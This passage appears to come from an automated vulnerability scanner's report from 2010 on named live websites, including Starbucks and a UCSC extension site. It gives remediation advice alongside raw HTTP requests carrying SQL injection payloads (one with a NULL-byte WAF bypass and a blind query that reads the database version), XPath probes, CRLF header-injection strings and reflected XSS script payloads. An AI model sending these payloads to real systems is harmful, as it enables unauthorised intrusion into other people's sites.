NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
UserName=-1 OR 1=1)) AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25),1,2))--%20&PassWord=3&sign-in=Sign+In&1%00'=1
Response 1 (redirected)
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.starbucks.com/error Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 01:00:12 GMT Content-Length: 154
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://www.starbucks.com/error">here</a></body>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /card/manage/check-your-balance HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 1
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: /error/ Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:43:18 GMT Connection: close Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/manage/check-your-balance HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:43:22 GMT Connection: close Content-Length: 38437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /card/rewards/card-rewards-canada HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=; Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: /error/ Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:44:19 GMT Connection: close Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/rewards/card-rewards-canada HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=; Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:44:21 GMT Connection: close Content-Length: 37056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /card/rewards/program-information HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 1
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: /error/ Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:43:32 GMT Connection: close Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/rewards/program-information HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:43:35 GMT Connection: close Content-Length: 42652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The .SbuxAuth cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the .SbuxAuth cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /card/starbucks-gold HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=%00'; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 1
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: /error/ Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:40:05 GMT Connection: close Content-Length: 124
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/error/">here</a>.</h2> </body></html>
Request 2
GET /card/starbucks-gold HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=%00''; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:40:08 GMT Connection: close Content-Length: 36235
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sites'/all/modules/drupal-contrib/nice_menus/superfish/js/jquery.bgiframe.min.js?p HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 07:54:22 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:54:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 140 Connection: close Content-Type: text/html; charset=utf-8
<br /> <b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>C:\wamp\www\includes\theme.inc</b> on line <b>648</b><br />
Request 2
GET /sites''/all/modules/drupal-contrib/nice_menus/superfish/js/jquery.bgiframe.min.js?p HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 2
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 07:54:53 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 07:54:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20787
<HTML>
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verify-v1" content="sFvtITlAUhqlLRlriu4OWFB1IYUYXEDykhl+jHxnJrE=" /> <title> Page not found ...[SNIP]...
1.289. http://www.ucsc-extension.edu/video/guy-kawasaki [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.ucsc-extension.edu
Path:
/video/guy-kawasaki
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/guy-kawasaki?1%00'=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 10:22:24 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 10:22:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Length: 185 Connection: close Content-Type: text/html; charset=utf-8
<br /> <b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>C:\wamp\www\sites\all\modules\drupal-contrib\nodewords\includes\taxonomy.inc</b> on line <b>17</b><br />
Request 2
GET /video/guy-kawasaki?1%00''=1 HTTP/1.1 Host: www.ucsc-extension.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESSd3f1951b53a40b5a0509492dccc18d3f=7c2oms450o5c01l4vib7od1542; __utmz=212304912.1291762378.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212304912.48527240.1291762378.1291762378.1291762378.1; __utma_a2a=8311320607.1323319304.1291762378.1291762378.1291762378.1; __utmc=212304912; __utmb=212304912.1.10.1291762378;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 10:22:55 GMT Server: Apache/2.2.11 (Win32) PHP/5.2.9 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Wed, 08 Dec 2010 10:22:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22576
<HTML>
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verify-v1" content="sFvtITlAUhqlLRlriu4OWFB1IYUYXEDykhl+jHxnJrE=" /> <title> Guy Kawasaki: E ...[SNIP]...
The advid parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the advid parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
Request
GET /ROP/Locations.aspx?adid=10246508&advid=36689'&loc=283268&z=5 HTTP/1.1 Host: newspaperads.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 08 Dec 2010 01:08:08 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml ...[SNIP]... res, String arg) at System.Xml.XmlTextReaderImpl.ParseRootLevelWhitespace() at System.Xml.XmlTextReaderImpl.ParseDocumentContent() at System.Xml.XmlTextReaderImpl.Read() at System.Xml.XPath.XPathDocument.LoadFromReader(XmlReader reader, XmlSpace space) at System.Xml.XPath.XPathDocument..ctor(TextReader textReader) at Travidia.Web.Generic.XpdFromString(String s) at Travidia.We ...[SNIP]...
3. HTTP header injectionpreviousnext There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload a391a%0d%0a9258e43f385 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 29340%0d%0abd03a24fa85 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /29340%0d%0abd03a24fa85/ HTTP/1.1 Host: www.mtgeinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Wed, 08 Dec 2010 07:26:03 GMT Content-length: 122 Content-type: text/html Location: http://www.infotrak.com/29340 bd03a24fa85/ Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
The value of the callback request parameter is copied into the Location response header. The payload 9f1fd%0d%0ab975c48afd3 was submitted in the callback parameter. This caused a response containing an injected HTTP header.
Request
GET /syndication/get_widget.js?callback=9f1fd%0d%0ab975c48afd3&output=json&location=http%3A%2F%2Fwww.mercurynews.com%2F×tamp=1291762313737&appId.0=d2e71d0a-2cb3-4fbd-bfc0-b3f04d8697eb HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Date: Wed, 08 Dec 2010 00:54:16 GMT Server: Apache/2.2.3 (Red Hat) Location: http://cdn.widgetserver.com/syndication/json/i/d2e71d0a-2cb3-4fbd-bfc0-b3f04d8697eb/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/8c01d0fffcdb01f1832ae8509cc156b14adb46640000012cb8ee8fe1/u/1/?callback=9f1fd b975c48afd3 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: application/x-javascript Content-Length: 0
4. Cross-site scripting (reflected)previous There are 320 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the CustomBoolean|isNational|true&query request parameter is copied into the HTML document as plain text between tags. The payload 7bbfc<script>alert(1)</script>50864528a8a was submitted in the CustomBoolean|isNational|true&query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1&endIndex=50&CustomBoolean|isNational|true&query=7bbfc<script>alert(1)</script>50864528a8a&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss&query=Categories|By%20Section/World HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:49 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid01 (squid/3.0.STABLE23) Connection: close
"7bbfc<script>alert(1)</script>50864528a8a" is an unknown query title.
The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload 31fd3<script>alert(1)</script>fea3eeff07b was submitted in the PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn31fd3<script>alert(1)</script>fea3eeff07b&startIndex=1&endIndex=50&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:39 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid02 (squid/3.0.STABLE23) Connection: close
The PID looks like it was cut-off ("Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn31fd3<script>alert(1)</script>fea3eeff07b"). This PID is 73 character(s) long, when it should be 32 characters long.
The value of the endIndex request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15a3e%3balert(1)//0265a4744a4 was submitted in the endIndex parameter. This input was echoed as 15a3e;alert(1)//0265a4744a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1&endIndex=5015a3e%3balert(1)//0265a4744a4&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:45 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid03 (squid/3.0.STABLE23) Connection: close
Invalid value for endIndex: 5015a3e;alert(1)//0265a4744a4
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 53d9b<script>alert(1)</script>da1690f1739 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1&endIndex=50&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=53d9b<script>alert(1)</script>da1690f1739&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss&query=Categories|By%20Section/World HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:59 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid03 (squid/3.0.STABLE23) Connection: close
"53d9b<script>alert(1)</script>da1690f1739" is an unknown query title.
The value of the startIndex request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 646e4%3balert(1)//cbee911c329 was submitted in the startIndex parameter. This input was echoed as 646e4;alert(1)//cbee911c329 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ps/getRSS?client=Standard&PID=Q4e4zwd6nt2TnhIf1cb3eAPzrpaM4rrn&startIndex=1646e4%3balert(1)//cbee911c329&endIndex=50&CustomBoolean|isNational|true&query=ContentCustomText|ExcludeDMAs|,&query=ContentCustomText|ExcludeStationGroups|,&query=ContentCustomText|ExcludeTypes|,&query=ContentCustomText|ExcludeCityStates|,&playerURL=http://video.ap.org/?f=CAJOS%26pid=%3CreleasePID%3E%26fg=rss HTTP/1.1 Host: ap.feeds.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 500 Internal Server Error Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Content-Type: text/plain Date: Tue, 07 Dec 2010 23:00:42 GMT X-Cache: MISS from feeds.theplatform.com Via: 1.0 sea1squid02 (squid/3.0.STABLE23) Connection: close
Invalid value for startIndex: 1646e4;alert(1)//cbee911c329
The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e001c%3balert(1)//b78489c2671 was submitted in the c parameter. This input was echoed as e001c;alert(1)//b78489c2671 in the application's response.
